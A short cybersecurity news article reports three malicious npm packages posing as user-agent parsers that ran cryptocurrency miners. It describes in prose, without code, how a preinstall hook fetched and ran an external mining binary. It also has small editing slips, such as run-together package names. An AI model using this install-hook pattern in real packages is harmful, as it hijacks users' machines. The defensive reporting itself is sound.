Malicious npm Packages Mine Cryptocurrency on Windows, Linux, macOS Devices

Malicious npm Packages Mine Cryptocurrency on Windows, Linux, macOS Devices

Three JavaScript libraries were discovered on the official NPM package repository that were confirmed to be crypto-mining malware. This week’s revelation highlighted how vulnerable open-source software repository systems are to exploitation for executing attacks on Windows, macOS, and Linux systems.

The packages in question, which were published by one same developer, were designed to extract sensitive information from HTTP’s HTTP header. Claimed to be JavaScript-based user-agent string parsers, they, however, were infected with cryptocurrency mining malware.

The bad actor’s NPM account was deactivated, and the three libraries – okhsaklow, and klown – were removed from the repository on October 15, 2021. The libraries were downloaded 112, 4, and 65 times respectively. “Klow” and “klown” have been tracked under Sonatype-2021-1472, and “okhsa” has been cataloged as Sonatype-2021-1473.

The attacks were carried out by running a .bat (for Windows) or .sh (for Unix-based OS) script:

“Packages  ‘klow’ and ‘klown’ contain a cryptocurrency miner. These packages detect the current operating system at the preinstall stage, and proceed to run a .bat or .sh script depending on if the user is running Windows or a Unix-based operating system.”

“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” Sonatype security researcher Ali ElShakankiry said.

This isn’t the first time that bad software has been found in the repository. Brandjacking, typosquatting, and cryptomining malware have been spotted before.

In June, security researchers from Sonatype and JFrog discovered packages on the PyPI repository that secretly deployed crypto-miners on affected machines. The packages were named after repositories or components from high-profile tech companies to perform what is known as dependency confusion attacks.

About the author

CIM Team

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.